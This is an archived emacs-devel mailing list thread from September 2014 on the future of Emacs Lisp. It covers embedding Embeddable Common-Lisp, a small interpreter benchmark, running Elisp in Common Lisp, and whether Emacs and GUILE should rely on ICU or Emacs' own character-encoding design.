* Re: Emacs Lisp's future (was: Guile emacs thread (again)) @ 2014-09-17 7:38 Kristian Nygaard Jensen 2014-09-17 15:15 ` Emacs Lisp's future Stefan Monnier 2014-09-26 13:43 ` Robin Templeton 0 siblings, 2 replies; 404+ messages in thread From: Kristian Nygaard Jensen @ 2014-09-17 7:38 UTC (permalink / raw) To: emacs devel > Of course, that's for the language side, but on the implementation side, > I don't really know what Common-Lisp implementation we could re-use > (both GNU implementations are dormant, so there's no manpower for us > tap into). Still: there are many Common-Lisp implementations out there, > so there's probably one that could work for us. Embeddable Common-Lisp (http://sourceforge.net/projects/ecls/) seems alive, it is lgpl, so there would be no license issue -- Kristian Nygaard Jensen ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 7:38 Emacs Lisp's future (was: Guile emacs thread (again)) Kristian Nygaard Jensen @ 2014-09-17 15:15 ` Stefan Monnier 2014-09-17 16:15 ` James Cloos 2014-09-26 13:43 ` Robin Templeton 1 sibling, 1 reply; 404+ messages in thread From: Stefan Monnier @ 2014-09-17 15:15 UTC (permalink / raw) To: Kristian Nygaard Jensen; +Cc: emacs devel > Embeddable Common-Lisp (http://sourceforge.net/projects/ecls/) seems alive, > it is lgpl, so there would be no license issue Indeed, it looks like it might be a good candidate. Stefan ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 15:15 ` Emacs Lisp's future Stefan Monnier @ 2014-09-17 16:15 ` James Cloos 2014-09-17 17:53 ` Stefan Monnier 0 siblings, 1 reply; 404+ messages in thread From: James Cloos @ 2014-09-17 16:15 UTC (permalink / raw) To: Stefan Monnier; +Cc: Kristian Nygaard Jensen, emacs devel >>>>> "SM" == Stefan Monnier <monnier@iro.umontreal.ca> writes: >> Embeddable Common-Lisp (http://sourceforge.net/projects/ecls/) seems alive, >> it is lgpl, so there would be no license issue SM> Indeed, it looks like it might be a good candidate. It is the lisp which sage supports (they have a funding grant which requires that sage be installable from source on just about anything which has an existing C compiler) and the maxima tests consistantly show it as second only to compiled-to-machine-code lisps like sbcl. As such, it looks like it will continue to have excellent development and support for the foreseeable future. -JimC -- James Cloos <cloos@jhcloos.com> OpenPGP: 0x997A9F17ED7DAEA6 ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 16:15 ` James Cloos @ 2014-09-17 17:53 ` Stefan Monnier 2014-09-17 21:46 ` Stefan Monnier ` (2 more replies) 0 siblings, 3 replies; 404+ messages in thread From: Stefan Monnier @ 2014-09-17 17:53 UTC (permalink / raw) To: James Cloos; +Cc: Kristian Nygaard Jensen, emacs devel > It is the lisp which sage supports (they have a funding grant which > requires that sage be installable from source on just about anything > which has an existing C compiler) and the maxima tests consistantly > show it as second only to compiled-to-machine-code lisps like sbcl. > As such, it looks like it will continue to have excellent development > and support for the foreseeable future. Sounds good. If someone wants to look deeper into what it would take to use ECL in Emacs, that would be very welcome. There are lots of potential issues in such a project. A start would be to check: - does it use its own event loop? - can it handle conservative stack scanning? - what other conventions are needed for C code to cooperate with the GC? - could we do something akin to our "dump"? Of course, another issue with Common-Lisp integration is that we'd want to figure out how to integrate the two languages. So, we'd need to investigate what are the current incompatibilities. Stefan ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 17:53 ` Stefan Monnier @ 2014-09-17 21:46 ` Stefan Monnier 2014-09-18 1:09 ` James Cloos ` (2 more replies) 2014-09-18 18:59 ` Johan Bockgård 2014-09-18 21:01 ` Sam Steingold 2 siblings, 3 replies; 404+ messages in thread From: Stefan Monnier @ 2014-09-17 21:46 UTC (permalink / raw) To: James Cloos; +Cc: Kristian Nygaard Jensen, emacs devel >> It is the lisp which sage supports (they have a funding grant which >> requires that sage be installable from source on just about anything >> which has an existing C compiler) and the maxima tests consistantly >> show it as second only to compiled-to-machine-code lisps like sbcl. Note that this speed is probably only for "compiled code". ECL has two evaluation methods: - "byte-code interpreter". - "compilation to native code via C" (requires a local installation of a C compiler). I just tried a silly microbenchmark to get an idea of the byte-code interpreter's performance: (let ((x 0)) (dotimes (i 10000000) (setq x (- i x))) x)) and on my machine, it took 3.5s compared. This isn't super-fast compared to Emacs-24.3 which takes 6.7s in the purely interpreted case and 1.7s in the byte-compiled case. Of course, this is a silly benchmark, but I think this indicates that ECL focuses on performance of compiled code (the above silly code runs in 0.7s when compiled, FWIW). Stefan ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 21:46 ` Stefan Monnier @ 2014-09-18 1:09 ` James Cloos 2014-09-18 7:12 ` Helmut Eller 2014-09-18 7:46 ` Thorsten Jolitz 2 siblings, 0 replies; 404+ messages in thread From: James Cloos @ 2014-09-18 1:09 UTC (permalink / raw) To: Stefan Monnier; +Cc: Kristian Nygaard Jensen, emacs devel >>>>> "SM" == Stefan Monnier <monnier@iro.umontreal.ca> writes: SM> Note that this speed is probably only for "compiled code". I hadn't realized that ecls compiled the lisp, and as you suspected maxima's install routine does compile itself when using ecls, just as it does when using sbcl. But it would be cool to have elisp compiled to fasl files. The main code could be compiled and linked as a library, rather than dumped. -JimC -- James Cloos <cloos@jhcloos.com> OpenPGP: 0x997A9F17ED7DAEA6 ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 21:46 ` Stefan Monnier 2014-09-18 1:09 ` James Cloos @ 2014-09-18 7:12 ` Helmut Eller 2014-09-18 7:46 ` Thorsten Jolitz 2 siblings, 0 replies; 404+ messages in thread From: Helmut Eller @ 2014-09-18 7:12 UTC (permalink / raw) To: emacs-devel On Wed, Sep 17 2014, Stefan Monnier wrote: >>> It is the lisp which sage supports (they have a funding grant which >>> requires that sage be installable from source on just about anything >>> which has an existing C compiler) and the maxima tests consistantly >>> show it as second only to compiled-to-machine-code lisps like sbcl. > > Note that this speed is probably only for "compiled code". The story that I've heard is that Maxima uses primarily GCL (not ECL, though it would also work in ECL and other CLs) and that GCL is fast in that case because Maxima uses old-fashioned idioms a lot, like EVAL all over the place. The last thing I've heard of ECL is that it's searching a new maintainer because the current one can no longer use it at work (university context where the Lisp using project has ended). There's also a fork of ECL called MKCL with supposedly better multithreading. Just saying, because ECL is apparently also short on man power. Helmut ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 21:46 ` Stefan Monnier 2014-09-18 1:09 ` James Cloos 2014-09-18 7:12 ` Helmut Eller @ 2014-09-18 7:46 ` Thorsten Jolitz 2 siblings, 0 replies; 404+ messages in thread From: Thorsten Jolitz @ 2014-09-18 7:46 UTC (permalink / raw) To: emacs-devel Stefan Monnier <monnier@iro.umontreal.ca> writes: > I just tried a silly microbenchmark to get an idea of the byte-code > interpreter's performance: > > (let ((x 0)) (dotimes (i 10000000) (setq x (- i x))) x)) > > and on my machine, it took 3.5s compared. This isn't super-fast > compared to Emacs-24.3 which takes 6.7s in the purely interpreted case > and 1.7s in the byte-compiled case. I could not resist to compare this with my favorite 'pure and powerful' (and interpreted) PicoLisp: ,---- | : (bench (let X 0 (for I 10000000 (setq X (- I X))) X)) | 0.338 sec | -> 5000000 `---- while the Emacs Lisp version on my machine yields: ,---- | : (benchmark-run nil (let ((x 0)) (dotimes (i 10000000) (setq x (- i x))) x)) `---- -> (3.5045056839999997 0 0.0) See ,---- | http://picolisp.com/wiki/?PILvsEL `---- for more speed comparisons between PicoLisp and Emacs Lisp. -- cheers, Thorsten ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 17:53 ` Stefan Monnier 2014-09-17 21:46 ` Stefan Monnier @ 2014-09-18 18:59 ` Johan Bockgård 2014-09-18 21:01 ` Sam Steingold 2 siblings, 0 replies; 404+ messages in thread From: Johan Bockgård @ 2014-09-18 18:59 UTC (permalink / raw) To: emacs-devel Stefan Monnier <monnier@iro.umontreal.ca> writes: > Sounds good. If someone wants to look deeper into what it would take to > use ECL in Emacs, that would be very welcome. You could try asking ECL's author, http://article.gmane.org/gmane.lisp.ecl.general/345 ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 17:53 ` Stefan Monnier 2014-09-17 21:46 ` Stefan Monnier 2014-09-18 18:59 ` Johan Bockgård @ 2014-09-18 21:01 ` Sam Steingold 2014-09-19 0:56 ` Stefan Monnier 2 siblings, 1 reply; 404+ messages in thread From: Sam Steingold @ 2014-09-18 21:01 UTC (permalink / raw) To: emacs-devel > * Stefan Monnier <zbaavre@veb.hzbagerny.pn> [2014-09-17 13:53:45 -0400]: > > Of course, another issue with Common-Lisp integration is that we'd > want to figure out how to integrate the two languages. So, we'd need > to investigate what are the current incompatibilities. Running ELisp code in CL has been supported for 15 years. http://sourceforge.net/p/clocc/hg/ci/default/tree/src/cllib/elisp.lisp -- Sam Steingold (http://sds.podval.org/) on darwin Ns 10.3.1265 http://www.childpsy.net/ http://palestinefacts.org http://iris.org.il http://memri.org http://truepeace.org http://openvotingconsortium.org Lottery is a tax on statistics ignorants. MS is a tax on computer-idiots. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-18 21:01 ` Sam Steingold @ 2014-09-19 0:56 ` Stefan Monnier 2014-09-19 12:24 ` Sam Steingold 0 siblings, 1 reply; 404+ messages in thread From: Stefan Monnier @ 2014-09-19 0:56 UTC (permalink / raw) To: Sam Steingold; +Cc: emacs-devel >> * Stefan Monnier <zbaavre@veb.hzbagerny.pn> [2014-09-17 13:53:45 -0400]: >> Of course, another issue with Common-Lisp integration is that we'd >> want to figure out how to integrate the two languages. So, we'd need >> to investigate what are the current incompatibilities. > Running ELisp code in CL has been supported for 15 years. > http://sourceforge.net/p/clocc/hg/ci/default/tree/src/cllib/elisp.lisp As mentioned when someone pointed to a CL-to-Elisp compiler, compiling one language to another is actually slightly different from integrating two language. Stefan ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-19 0:56 ` Stefan Monnier @ 2014-09-19 12:24 ` Sam Steingold 0 siblings, 0 replies; 404+ messages in thread From: Sam Steingold @ 2014-09-19 12:24 UTC (permalink / raw) To: emacs-devel > * Stefan Monnier <zbaavre@veb.hzbagerny.pn> [2014-09-18 20:56:49 -0400]: > >>> * Stefan Monnier <zbaavre@veb.hzbagerny.pn> [2014-09-17 13:53:45 -0400]: >>> Of course, another issue with Common-Lisp integration is that we'd >>> want to figure out how to integrate the two languages. So, we'd need >>> to investigate what are the current incompatibilities. >> Running ELisp code in CL has been supported for 15 years. >> http://sourceforge.net/p/clocc/hg/ci/default/tree/src/cllib/elisp.lisp > > As mentioned when someone pointed to a CL-to-Elisp compiler, compiling > one language to another is actually slightly different from > integrating two language. I am puzzled by this distinction. When you load elisp.lisp into your CL, you can * load ELisp files, e.g., >>> (el::load "backquote") >>> (el::load "calendar") >>> (el::load "cal-hebrew") >>> (el::load "subr") >>> (el::load "help") * Compile them: >>> (cllib::compile-el-file "backquote") >>> (cllib::compile-el-file "calendar") >>> (cllib::compile-el-file "cal-hebrew") * Run ELisp code: >>> (el::calendar-hebrew-date-string) I am not sure what if missing. -- Sam Steingold (http://sds.podval.org/) on darwin Ns 10.3.1265 http://www.childpsy.net/ http://islamexposedonline.com http://americancensorship.org http://memri.org http://mideasttruth.com Just because you're paranoid doesn't mean they AREN'T after you. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 7:38 Emacs Lisp's future (was: Guile emacs thread (again)) Kristian Nygaard Jensen 2014-09-17 15:15 ` Emacs Lisp's future Stefan Monnier @ 2014-09-26 13:43 ` Robin Templeton 2014-09-26 14:15 ` David Kastrup 1 sibling, 1 reply; 404+ messages in thread From: Robin Templeton @ 2014-09-26 13:43 UTC (permalink / raw) To: emacs-devel Kristian Nygaard Jensen <freeduck@member.fsf.org> writes: >> Of course, that's for the language side, but on the implementation side, >> I don't really know what Common-Lisp implementation we could re-use >> (both GNU implementations are dormant, so there's no manpower for us >> tap into). Still: there are many Common-Lisp implementations out there, >> so there's probably one that could work for us. > > Embeddable Common-Lisp (http://sourceforge.net/projects/ecls/) seems > alive, it is lgpl, so there would be no license issue ECL's maintainer resigned last year: <http://permalink.gmane.org/gmane.lisp.ecl.general/10264>. There have been no releases since, and recent mailing list posts indicate that there is no current maintainer. -- Inteligenta persono lernas la lingvon Esperanton rapide kaj facile. Esperanto estas moderna, kultura lingvo por la mondo. Simpla, fleksebla, belsona, Esperanto estas la praktika solvo de la problemo de universala interkompreno. Lernu la interlingvon Esperanton! ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-26 13:43 ` Robin Templeton @ 2014-09-26 14:15 ` David Kastrup 2014-09-26 14:45 ` Dmitry Antipov 0 siblings, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-09-26 14:15 UTC (permalink / raw) To: emacs-devel Robin Templeton <robin@terpri.org> writes: > Kristian Nygaard Jensen <freeduck@member.fsf.org> writes: > >>> Of course, that's for the language side, but on the implementation side, >>> I don't really know what Common-Lisp implementation we could re-use >>> (both GNU implementations are dormant, so there's no manpower for us >>> tap into). Still: there are many Common-Lisp implementations out there, >>> so there's probably one that could work for us. >> >> Embeddable Common-Lisp (http://sourceforge.net/projects/ecls/) seems >> alive, it is lgpl, so there would be no license issue > > ECL's maintainer resigned last year: > <http://permalink.gmane.org/gmane.lisp.ecl.general/10264>. There have > been no releases since, and recent mailing list posts indicate that > there is no current maintainer. While not an example for how to keep one's temper, in the course of <URL:http://debbugs.gnu.org/cgi/bugreport.cgi?bug=18520> I suggest that Emacs buffers could be based on string ports with random access. The basic idea here is, of course, that the fundamental operation of a string port is adding unknown amounts of material "at point". Personally, I think that there is a lot of potential to tie strings, encodings, buffers, ports quite closely together in Emacs and Guile, and part of that reason is that I consider Emacs' multinational string/buffer/multibyte/unibyte handling a lot more mature in concepts and implementation than that of GUILE. Scheme does not prescribe a whole lot regarding the details of character sets and string handling (except that Scheme strings tend to have a stronger focus on being rewritable, something that works pretty badly on variable-length encodings but which Emacs purports to support at least using aset). And I think that the user and application pressure on Emacs/MULE in that regard has in the time since Emacs 20 lead to pretty good solutions. GUILE in particular has problems coming to grips about the difference between "internal UTF-8 based encoding" and "external UTF-8 encoding which might contain bytes violating the UTF-8 guarantees" and not having unnecessary crossbleed between them. Since Emacs historically had a completely different internal multibyte encoding, it has kept those apart much cleaner. If GUILE wants to take over Emacs regarding its computing, I think it first has to get itself infiltrated by Emacs' handling of strings and buffers. I have no idea whether this should go as far as to replace iconv with CCL programs. It would have the advantage of using actively maintained and used GNU-controlled technology for the multi-language stuff (and Emacs is rather good in that area), but I have no idea how good a fit this could be. At any rate: the Scheme standards leave a lot things open regarding actual multinational character set and string support, and I feel that the historic pressure of the text-based Emacs might have done a better job so far of producing concepts and results that work well in practice than what the GUILE developers were forced to work with regarding foreign alphabets. So instead of interfacing one to the other, I think GUILE has more to win than to lose by adopting some of the Emacs concepts and data models regarding text/string processing rather than designing its own. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-26 14:15 ` David Kastrup @ 2014-09-26 14:45 ` Dmitry Antipov 2014-09-26 15:05 ` David Kastrup 2014-09-26 15:07 ` Eli Zaretskii 0 siblings, 2 replies; 404+ messages in thread From: Dmitry Antipov @ 2014-09-26 14:45 UTC (permalink / raw) To: David Kastrup; +Cc: emacs-devel On 09/26/2014 06:15 PM, David Kastrup wrote: > So instead of interfacing one to the other, I think GUILE has more to > win than to lose by adopting some of the Emacs concepts and data models > regarding text/string processing rather than designing its own. Adopting Emacs? Why not just use ICU? This project's page claims about "GPL-compatible" free license (http://userguide.icu-project.org/icufaq). Dmitry ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-26 14:45 ` Dmitry Antipov @ 2014-09-26 15:05 ` David Kastrup 2014-09-27 8:44 ` Stephen J. Turnbull 2014-09-26 15:07 ` Eli Zaretskii 1 sibling, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-09-26 15:05 UTC (permalink / raw) To: Dmitry Antipov; +Cc: emacs-devel Dmitry Antipov <dmantipov@yandex.ru> writes: > On 09/26/2014 06:15 PM, David Kastrup wrote: > >> So instead of interfacing one to the other, I think GUILE has more to >> win than to lose by adopting some of the Emacs concepts and data models >> regarding text/string processing rather than designing its own. > > Adopting Emacs? Why not just use ICU? This project's page claims about > "GPL-compatible" free license (http://userguide.icu-project.org/icufaq). Because ICU is not under the control of the GNU project. Whenever there is a need that needs to be fulfilled, it is not a priority for ICU. For example, it is an error for ICU if some string cannot properly be decoded. Emacs is capable of decoding random byte strings "as utf-8" and reencode them afterwards resulting in the original byte string, by using special characters to indicate "undecodable byte". This means that if you edit some source code file where comments have been added in different encodings, or which contains strings in several different encodings for whatever reason, you can save the file afterwards and have it only changed in those sections you actually edited, without any modifications in sections you did not touch but which still had to go through decoding on load and encoding on save. For an editor, those are very important features. For a third-party library, stuff like that may not be a priority. In addition, Emacs' string handling and encoding/reencoding has a longer history than UTF-8 and most such libraries. It's mature, and it definitely fits Emacs' bill. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-26 15:05 ` David Kastrup @ 2014-09-27 8:44 ` Stephen J. Turnbull 2014-09-27 8:59 ` David Kastrup 0 siblings, 1 reply; 404+ messages in thread From: Stephen J. Turnbull @ 2014-09-27 8:44 UTC (permalink / raw) To: David Kastrup; +Cc: Dmitry Antipov, emacs-devel David Kastrup writes: > Dmitry Antipov <dmantipov@yandex.ru> writes: > > Adopting Emacs? Why not just use ICU? This project's page claims about > > "GPL-compatible" free license (http://userguide.icu-project.org/icufaq). > > Because ICU is not under the control of the GNU project. You can say the same about the Linux kernel, for example. Nevertheless, the HURD has never made it to ready-for-prime-time status. At some point it's worth delegating maintenance of 99% of your needs to another project, and Emacs has already been through the Mule-to-Unicode internal encoding conversion. Would you really wish that on another project? > In addition, Emacs' string handling and encoding/reencoding has a > longer history than UTF-8 and most such libraries. It's mature, > and it definitely fits Emacs' bill. I really doubt it will take much effort to move Emacs to ICU (compared to grafting Emacs's complex internal facilities onto another project). ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-27 8:44 ` Stephen J. Turnbull @ 2014-09-27 8:59 ` David Kastrup 2014-09-27 15:30 ` Stephen J. Turnbull 0 siblings, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-09-27 8:59 UTC (permalink / raw) To: Stephen J. Turnbull; +Cc: Dmitry Antipov, emacs-devel "Stephen J. Turnbull" <stephen@xemacs.org> writes: > David Kastrup writes: > > Dmitry Antipov <dmantipov@yandex.ru> writes: > > > > Adopting Emacs? Why not just use ICU? This project's page claims about > > > "GPL-compatible" free license (http://userguide.icu-project.org/icufaq). > > > > Because ICU is not under the control of the GNU project. > > You can say the same about the Linux kernel, for example. The last time I looked, Emacs ran on more platforms than GNU/Linux. We don't have a tie-in here. > Nevertheless, the HURD has never made it to ready-for-prime-time > status. At some point it's worth delegating maintenance of 99% of > your needs to another project, and Emacs has already been through the > Mule-to-Unicode internal encoding conversion. Would you really wish > that on another project? The point is that "GUILE" and "Emacs" are slated to be linked, and that will not happen if that would seriously degrade Emacs' usability for working with texts. It is a core capability of Emacs we are talking about here. > > In addition, Emacs' string handling and encoding/reencoding has a > > longer history than UTF-8 and most such libraries. It's mature, > > and it definitely fits Emacs' bill. > > I really doubt it will take much effort to move Emacs to ICU (compared > to grafting Emacs's complex internal facilities onto another project). If it would not take much effort, then it should be attempted independently. Only in that manner can one properly estimate the respective performance, footprint, programming and compatibility impacts independently from those of moving to GUILE. But that still does not touch the problem of making a core tenet of Emacs, one where Emacs needs to perform better and more versatile than most other applications and where we are talking about much more performance-relevant behavior than for most applications, depend on an externally controlled and maintained library. That's a particularly important reason for evaluating an ICU dependency in a separate branch independent from GUILE first. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-27 8:59 ` David Kastrup @ 2014-09-27 15:30 ` Stephen J. Turnbull 0 siblings, 0 replies; 404+ messages in thread From: Stephen J. Turnbull @ 2014-09-27 15:30 UTC (permalink / raw) To: David Kastrup; +Cc: Dmitry Antipov, emacs-devel David Kastrup writes: > If it would not take much effort, then it should be attempted > independently. Oh, it will. But given what I've already got on my schedule, if I get to it before Emacs does, shame on Emacs. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-26 14:45 ` Dmitry Antipov 2014-09-26 15:05 ` David Kastrup @ 2014-09-26 15:07 ` Eli Zaretskii 2014-09-26 15:21 ` David Kastrup 2014-09-27 8:35 ` Stephen J. Turnbull 1 sibling, 2 replies; 404+ messages in thread From: Eli Zaretskii @ 2014-09-26 15:07 UTC (permalink / raw) To: Dmitry Antipov; +Cc: dak, emacs-devel > Date: Fri, 26 Sep 2014 18:45:54 +0400 > From: Dmitry Antipov <dmantipov@yandex.ru> > Cc: emacs-devel@gnu.org > > Why not just use ICU? Emacs needs to be able to extend the Unicode code-point space for raw 8-bit bytes and for a couple of character sets that are not unified. Can ICU support that? If not, we cannot base our implementation on ICU without a lot of redesign. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-26 15:07 ` Eli Zaretskii @ 2014-09-26 15:21 ` David Kastrup 2014-09-27 8:35 ` Stephen J. Turnbull 1 sibling, 0 replies; 404+ messages in thread From: David Kastrup @ 2014-09-26 15:21 UTC (permalink / raw) To: Eli Zaretskii; +Cc: Dmitry Antipov, emacs-devel Eli Zaretskii <eliz@gnu.org> writes: >> Date: Fri, 26 Sep 2014 18:45:54 +0400 >> From: Dmitry Antipov <dmantipov@yandex.ru> >> Cc: emacs-devel@gnu.org >> >> Why not just use ICU? > > Emacs needs to be able to extend the Unicode code-point space for raw > 8-bit bytes and for a couple of character sets that are not unified. > Can ICU support that? If not, we cannot base our implementation on > ICU without a lot of redesign. Well, the context here was the integration of Emacs and GUILE, and it would be optimistic to think that efficient string/buffer handling will not leave us with a lot of redesign either way. Matching GUILE and Emacs allows us to compare and integrate the best approaches from either side. With ICU, it will always be "take it or leave it". It may be good enough. If it isn't in some small respect, getting it changed or fixed is not under our control. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-26 15:07 ` Eli Zaretskii 2014-09-26 15:21 ` David Kastrup @ 2014-09-27 8:35 ` Stephen J. Turnbull 2014-09-27 8:49 ` David Kastrup 2014-09-27 9:32 ` Eli Zaretskii 1 sibling, 2 replies; 404+ messages in thread From: Stephen J. Turnbull @ 2014-09-27 8:35 UTC (permalink / raw) To: Eli Zaretskii; +Cc: Dmitry Antipov, dak, emacs-devel Eli Zaretskii writes: > > Date: Fri, 26 Sep 2014 18:45:54 +0400 > > From: Dmitry Antipov <dmantipov@yandex.ru> > > Cc: emacs-devel@gnu.org > > > > Why not just use ICU? > > Emacs needs to be able to extend the Unicode code-point space for raw > 8-bit bytes and for a couple of character sets that are not unified. No, you don't. There's plenty of private space for those purposes (unless you know of private character sets that use more than two whole planes?) Emacs would simply use an indirect representation for private space. (That is, code points in private space are not necessarily identical to the input code points, but rather are indexes into an auxiliary table which implements the disjoint sum of the private code spaces in use.) Since this is private space, you need to build a table of attributes for these characters (I/O representation, UCD properties, glyphs, etc) anyway. For Unicode input using private space, you just record that as the I/O representation. > Can ICU support that? Maybe it would be unhappy if you used a lone surrogate representation (or other representation using integers outside of the Unicode character space) for those "extended code points", but as proposed above you can efficiently use private space in practice. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-27 8:35 ` Stephen J. Turnbull @ 2014-09-27 8:49 ` David Kastrup 2014-09-27 9:32 ` Eli Zaretskii 1 sibling, 0 replies; 404+ messages in thread From: David Kastrup @ 2014-09-27 8:49 UTC (permalink / raw) To: Stephen J. Turnbull; +Cc: Eli Zaretskii, Dmitry Antipov, emacs-devel "Stephen J. Turnbull" <stephen@xemacs.org> writes: > Eli Zaretskii writes: > > > Date: Fri, 26 Sep 2014 18:45:54 +0400 > > > From: Dmitry Antipov <dmantipov@yandex.ru> > > > Cc: emacs-devel@gnu.org > > > > > > Why not just use ICU? > > > > Emacs needs to be able to extend the Unicode code-point space for raw > > 8-bit bytes and for a couple of character sets that are not unified. > > No, you don't. There's plenty of private space for those purposes > (unless you know of private character sets that use more than two > whole planes?) Emacs would simply use an indirect representation for > private space. (That is, code points in private space are not > necessarily identical to the input code points, but rather are indexes > into an auxiliary table which implements the disjoint sum of the > private code spaces in use.) > > Since this is private space, you need to build a table of attributes > for these characters (I/O representation, UCD properties, glyphs, etc) > anyway. For Unicode input using private space, you just record that > as the I/O representation. > > > Can ICU support that? > > Maybe it would be unhappy if you used a lone surrogate representation > (or other representation using integers outside of the Unicode > character space) for those "extended code points", but as proposed > above you can efficiently use private space in practice. Except that Emacs, as an editor, needs to support the private spaces users might want to use. Hijacking the surrogates is a reasonable compromise. Another would have been hijacking the 4-byte encodable code space beyond Unicode character 1114111 that is outside of UTF-8 but inside of the coding scheme's logic and thus working equally well for string manipulations: however, that would cause unencodable bytes to take up more space. I think LuaTeX may use that strategy. Being an editor, Emacs has to be more circumspect than most other encoding-sensitive applications about what it may work with since everything that is "private" may well be within the range that a user wants to be able to put into string literals. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-27 8:35 ` Stephen J. Turnbull 2014-09-27 8:49 ` David Kastrup @ 2014-09-27 9:32 ` Eli Zaretskii 2014-09-27 10:37 ` Stephen J. Turnbull 2014-09-29 13:17 ` K. Handa 1 sibling, 2 replies; 404+ messages in thread From: Eli Zaretskii @ 2014-09-27 9:32 UTC (permalink / raw) To: Stephen J. Turnbull, Kenichi Handa; +Cc: dmantipov, dak, emacs-devel > From: "Stephen J. Turnbull" <stephen@xemacs.org> > Date: Sat, 27 Sep 2014 17:35:12 +0900 > Cc: Dmitry Antipov <dmantipov@yandex.ru>, dak@gnu.org, emacs-devel@gnu.org > > Eli Zaretskii writes: > > > Date: Fri, 26 Sep 2014 18:45:54 +0400 > > > From: Dmitry Antipov <dmantipov@yandex.ru> > > > Cc: emacs-devel@gnu.org > > > > > > Why not just use ICU? > > > > Emacs needs to be able to extend the Unicode code-point space for raw > > 8-bit bytes and for a couple of character sets that are not unified. > > No, you don't. There's plenty of private space for those purposes > (unless you know of private character sets that use more than two > whole planes?) I take it that you have studied the charsets for which we use codepoints above 0x10FFFF, and concluded that they all fit in the 2*64K+6.4K PUA space provided by Unicode? We have several quite large character sets which need that (grep mule-conf.el for ":unify-map" to see the list, and see etc/charsets/ for the map files). I'm not sure the PUA space is large enough, but I didn't sum all the numbers. In any case, the question why we don't use PUA for this is best addressed to Handa-san (CC'ed). > Emacs would simply use an indirect representation for > private space. (That is, code points in private space are not > necessarily identical to the input code points, but rather are indexes > into an auxiliary table which implements the disjoint sum of the > private code spaces in use.) IIUC, this is a non-trivial complication. Currently, our mapping is set up so that we can keep the non-unified characters in our buffers, while you propose indirection via tables. This means, for example, that direct access to char-tables will become slower. > Since this is private space, you need to build a table of attributes > for these characters (I/O representation, UCD properties, glyphs, etc) > anyway. For Unicode input using private space, you just record that > as the I/O representation. Yes, and the question is how well does ICU support setting up these. I don't know the answer to that. It is also not clear to me whether what you suggest will support the internal representation of raw bytes and their conversion to and from their external (a.k.a. "encoded") 8-bit values. In any case, I agree that using ICU in Guile would be a huge step forward, because currently they simply rely on the underlying libc, which is only a more-or-less safe bet when libc is glibc; if not, the results fall very short of what the user needs and Emacs expects. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-27 9:32 ` Eli Zaretskii @ 2014-09-27 10:37 ` Stephen J. Turnbull 2014-09-27 11:13 ` David Kastrup 2014-09-29 13:17 ` K. Handa 1 sibling, 1 reply; 404+ messages in thread From: Stephen J. Turnbull @ 2014-09-27 10:37 UTC (permalink / raw) To: Eli Zaretskii; +Cc: Kenichi Handa, dmantipov, dak, emacs-devel Eli Zaretskii writes: > I take it that you have studied the charsets for which we use > codepoints above 0x10FFFF, and concluded that they all fit in the > 2*64K+6.4K PUA space provided by Unicode? No, I've studied the coded character sets that are actually used by real people in this world, and concluded that for practical purposes, the Unicode coded character set plus the PUA permits representing all of them satisfactorily for a TTY, and that the additional burden of disambiguating them (eg, for font choice in a GUI) should be handled by markup (eg, the XML lang attribute in text/* representations, and text properties in Emacs). > We have several quite large character sets which need that (grep > mule-conf.el for ":unify-map" to see the list, and see > etc/charsets/ for the map files). I'm not sure the PUA space is > large enough, but I didn't sum all the numbers. If :unify-map really means that all of those character sets are mapped injectively into the Emacs coded character set, OK, it's just Mule code all over again. Since CNS alone has about 80,000 characters in it and that's just for a start, no, there is not enough space in the Unicode PUA for complete (and mostly redundant) copies of a double handful of Han character sets. ^ permalink raw reply [flat|nested] 404+ messages in thread
